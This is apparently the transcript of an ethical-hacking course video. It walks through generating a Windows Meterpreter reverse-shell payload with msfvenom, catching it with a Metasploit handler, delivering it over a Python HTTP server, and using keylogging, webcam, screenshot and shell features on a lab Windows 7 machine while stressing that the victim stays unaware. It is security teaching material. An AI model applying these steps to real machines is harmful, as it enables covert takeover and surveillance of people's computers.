Hi guys, and welcome to our next video. This video is going to be all about creating payloads, because our payload, our exploit, basically Eternal Book did not do the job how we wanted. For example, the whole procedure, you saw what it is, you saw the demonstration about crashing the system, you saw how we find vulnerabilities, you saw how we actually analyze them, and therefore choose proper exploits for that vulnerability. Yeah, it was the good to that point where the server, the machine was crashed completely by our exploit, and this is because the exploit is touching directly the memory, and that touching could not be resisted, and the machine just crashed 2 times, which is actually really bad, but it's a good practice to see how it's done, to see what means to crash the system remotely, to see how you can actually do that, and of course not to do that, because this is not what we want. So in the previous video we showed how the Windows 7 crashed completely with using the Eternal Book exploit, and now this is not what we wanted. So for now we should go for something else. We should go for a different exploit. We should go for a different strategy. And keep in mind that in this module, the idea of this whole module is to actually do the basics about how the exploits really work, show you all the basics, show you the fundamentals about how the reverse shell is working, how the metasploit is working, and how the payloads are working. In this video we're going to show just that, how the payloads are working. You're going to see different types of payload. So here I have Windows machine running background and my Kali machine, and now we're going to actually use some payloads, deliver that payloads, and therefore run them in order to see what can we do. But I just want to make a quick note that before you actually run an exploit, who is saying that it's working with the memory, be careful, it's dangerous, and you saw why. This was the perfect example, the perfect demonstrations about why it's dangerous to run that kind of exploits. So now it's time to actually use something to generate payloads, and keep in mind that that payload delivery method will be explained and demonstrated in future videos, because this is really a hard topic. If we have a server-side attacks, we can go for remote code execution, we can go for different kinds of attacks. But if we have client-side attacks, we can go for social engineering, so lying and tricking the victim to actually click our link or file. So we're gonna see both types of attacks in the future videos, where we're gonna explain and demonstrate how you can attack a client side and a server side. But in this module, in this video, the point is to see and practice how the exploits are actually working. This is like a test environment. So now to generate exploits, I'm going to use a tool called msfvenom. So msfvenom, this is installed with the metasploit. So msfvenom, we can specify the payload, which is Windows meterpreter, and then reverse TCP. Then we're going to specify the host, which is me. As we said before, the reverse shell is just forcing our machine to act as a server and the other machine to act as a client. So 192.168.1.106, that's why we are specifying our IP address, port to be 4444, and therefore like that to be actually exe. This is the format, and therefore to be running root desktop test.exe. So this is going to generate our payload file, and afterwards, as you can see, it's using Ruby. Here it's using Ruby, as we spoken before. And here we can actually start the metasploit console, so msf console, while the payload is generating. Okay, so we have 341 bytes, and final size of exe is 7300 bytes, 1000, sorry. So this metapreter, it's a huge session, it's a heavy session, and now you're gonna see it in action. So now just set up the exact same variables, like use exploit multi handler. This is like the basics of exploit. This is the exploit who is actually handling the reverse shell. This is the universal, and that's why it's used multi and not especially a technology or operational system. It's called multi because it's working for Windows and Linux as well. So we go for multi handler. This is the handler of our payload. Then we go for this, basically where we are setting our server. We are setting our machine to work as a server. This is how we do it with that exploit. So now we go for set lhost 192.168.1.106, and therefore set lport 4444. Yeah. And then when you run exploit, in that very moment when you run exploit, now our machine is gonna stay there and wait for a connection. This is how we set up our machine to act as a server and to wait on connection for that port 4444. But before that, I want to make clear that if you're using a firewall, you can either disable it, which is a bad practice, or you can enable that specific port. For example, enable. I'm going to show you both scenarios. So now we're going to enable the firewall. And if we go status, we can see that 4444 is allowed. So now we're going to disable it. And let's see what happens. Deny, sorry. Okay, so we have deny 4444. Okay, so now let's actually use a quick trick in order to actually transmit that file. When we are using Python, when we have Python, we can build simple HTTP server so that the victim can connect and download. It's making the transfer revenue files very simple. So we can go like Python m simple HTTP server, and then specify the port like 8000. But sorry, you need to specify it in the current directory you are working at. So cd desktop and there run the command. Now when we're going to navigate our IP from that machine, like 192.168.1.106 8000, we're going to see the desktop files there if everything's alright. So now wait a little bit. So guys, as you can see, we cannot connect, and that's why we actually have to edit the firewall. So the firewall now is blocking that port, and that's why we can't connect. So go here, do therefore enable, actually allow 8000, and now if we go for the Python a simple HTTP server, we would be able to connect. So now sorry, go here, refresh that page. Yep, and now you see the desktop, the whole desktop of our Kaggle machine. And now we need to download this test.txt file, download it, and now we have to just open and run it. Run. So now if we go back to our Kaggle machine and see the Metasploit module, okay, so we don't have session because we actually disabled the port. So I want to mention and show you how the actual firewall is working. We've disabled that port, so when we run that, the target machine actually sent us the packets, sent us the shell, the interpreter shell, it's there, but our firewall on our local level has blocked it. So this is what I was talking about. You don't need to actually do that. You need to actually open that port to get the reverse shell going on. But I am explaining you this in order to protect yourself from actually emerging into that program. So make sure, please make sure every time you go for reverse shell, make sure that your firewall is either disabled or open the exact same port you need. That's why we cannot connect to our machine right now. So now if you actually open your terminal and say you have to enable 4444, actually allow 4444, and click clear, and now we actually run this program. Go for run it again. So here, run. Now we can actually see that we have a session. Yeah, as we can see, we have an active session right now, and this is the interpreter session I was talking about. So please take it curious here. Take it really. This is really important about the firewall. You don't need to disable the port you are trying to connect with. If you have forgotten firewall, you have to do, if you are doing the same thing remotely, you have to do the same thing on your router, on your gateway, because it's filtering all traffic as we've spoken about in the previous video. So you won't get the shell because you own block your own shell. And this is stupid, you know, you don't need to do that. So make sure that every time you are doing reverse shell, you have the needed open ports. As you can see, we couldn't connect to the web server because we disabled locally on our local firewall the port 8000, and we couldn't get the reverse shell because we actually disabled that port 4444. And the moment we enabled it, it's alright, we can get the reverse shell now. and now we have it. So please always double check, triple check your open ports, and if needed disable the firewall, which is a bad practice because you are vulnerable if you disable the firewall, because you can connect to everywhere when you have services open, and therefore you can also allow the specific ports so your reverse shell is okay. And remember, when you're doing this outside of your network, I need to repeat that, please check your router, your gateway's port forwarding table, because there you need to forward the exact same port. Imagine the graph we were talking about. The target is connecting to you, but the traffic is going through the gateway. So in the gateway, you have to enable 4444 in that example, and then in your local firewall, you have to enable 4444 again. So the packets can actually send to you. If one of the both firewall blocking that port, you will not get the shell. So guys, now here we have the meterpreter shell. Let's just close that Python one and clear and exit. Now we have a meterpreter shell here, and this is what I was talking about. So we have help, and we have different options like play audio file. We can play remotely an audio file. We can go for webcam stream if they are sending. We can go for microphone. We can go for keyloggers, which is basically a program which actually scans and saves all keys that you've entered. Key scan stop, screenshot. We can go for a screenshot to see what is doing. Screenshot. So we just save it there, and if we go to root and open that file, it's gonna give us a screenshot of its desktop. So this is what he's doing right now. And if we go to our machine, it's exactly the same. Yeah, so it's just working. And now we can close that. Sorry. Close, quit. Now just close that again, and let's see other options. We can get system. So we have play, we have set desktop. Okay, so we have reboot, pgrep, a lot of options. PS to see running process, reboot. We can remotely reboot the system. We can invoke shell from here. We can shut down, steal tokens, sysinfo. Let's go sysinfo. Yeah, we have Windows 7 service pack. Yeah, so we are inside that machine, and we can copy, upload files. Basically, when we get the meterpreter shell, as you can see, we can do whatever we want. Our machine, that machine is ours. It's under our control, so we can do whatever we want with that machine. For example, we can provoke shell. Yeah, and now we are in the command prompt of that machine. Yeah, using those clear like cd desktop. Now let's just mkdir testdir. Now if we go to our machine and see the desktop, we can see the testdir here. So this is what I mean by working behind the operational system. You see, we have the graphical user interface here, we have the desktop, we have the Windows 7, but we are inside that machine. The user do not see anything, but we can interact and do all kinds of commands we were talking about in the previous videos, do all kinds of commands here, and actually control, we get the complete control over the system without the user even to know it. So as you can see, he cannot even suspicious anything. He don't get any suspicious unless we go for folders and files and change desktop and do many more stuff and play audio. So these are the things that's gonna get us out of cover. They're gonna actually make us visible. But if we do not do that things, do that mistakes, we are invisible before the operational system. We are under the operational system, under the graphical user interface, and we are working on one level bottom. So this is why these stationary exploits are so powerful, because they are actually untraceable. See, the user cannot verify that he's being hacked. He don't see nothing strange. He's just browsing. He's doing nothing suspicious. But if, for example, we're making deals, we're gonna get us out of cover, of course. But if we do not do that, we are okay. So let's go back to Kali machine and see, we have amazing type of controls. We have amazing tools to do here. So this means that that machine is under our control. So we've successfully hacked it, and we successfully have the full control over that machine. So clear now, exit. Now we are to the meterpreter session again. Okay, so help, and we have the exact same option. We can actually background that. So BG And now if we go for sessions I, we get a list of all sessions, and now we can interact with sessions I and the ID, for example 1, and you see that the connection where it's coming from. So yeah, whenever you get session, then there's the game over. So that's it. This is how, guys, the reverse shell is actually working. This is how you set up your machine as a server. This is how you use your handler. Handler means that it's waiting for a connection, and that's how you connect the device. In the moment the user opens that file, just clicks that file, the file is forcing the machine to connect to us on that specific port with that specific instructions. Giving the shell is no difference from running instructions. The process, the machine, is just know the instructions itself. So the program is running the instructions of getting a shell in our side, and that's what it does. It just gives a shell. For example, if we only get the shell payload, we wouldn't have the interpreter environment, we would have only the shell one. So if we get the shell exploit, we're gonna get that exact window without the interpreter, and if we go exit, we're gonna kill the exact session, the whole session. So this is the difference. When we go shell, it's whiter, it's more easy and stealth, but it's giving us just the shell, just the command prompt of that Windows user. But if we get an interpreter, we have several and more options. For example, get system, getting screenshots, getting more stuff. But let's say that even the shell is enough. Even the shell can give us a control, and if we know the commands, we can do whatever we want with that PC. Because everything that can be done with the mouse and the keyboard using the graphical user interface can be done with the keyboard using the command line. So guys, this is how the reverse shell is working. This is the fundamentals of reverse shell. Just setting our server as a server, and setting our machine as a server, and just forcing the other machine to connect us with the instructions of getting shell. So thank you guys for watching, and stay tuned.